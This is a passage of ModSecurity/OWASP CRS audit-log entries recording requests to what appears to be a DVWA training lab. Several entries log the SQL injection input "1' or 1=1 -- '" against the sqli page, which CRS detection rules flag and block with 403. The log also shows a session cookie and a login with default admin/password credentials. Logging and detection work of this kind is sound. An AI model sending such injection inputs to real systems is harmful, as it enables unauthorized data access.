\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":556,"p2":3522,"p3":0,"p4":0,"p5":3047,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:41 --0400","transaction_id":"WRdUVX8AAQEAABwQSCoAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":466,"p2":3121,"p3":0,"p4":0,"p5":188,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSCsAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUWH8AAQEAABwQSCsAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":424,"p2":1804,"p3":113,"p4":240,"p5":94,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSCwAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUWH8AAQEAABwQSCwAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":426,"p2":1482,"p3":57,"p4":147,"p5":79,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSC0AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"700","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdUWH8AAQEAABwQSC0AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":591,"p2":1781,"p3":120,"p4":440,"p5":92,"sr":22,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:46 --0400","transaction_id":"WRdUWn8AAQEAABwQSC4AAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=d0d07c67e4897ee73431149640762432"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=94","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdUWn8AAQEAABwQSC4AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":526,"p2":3096,"p3":110,"p4":161,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 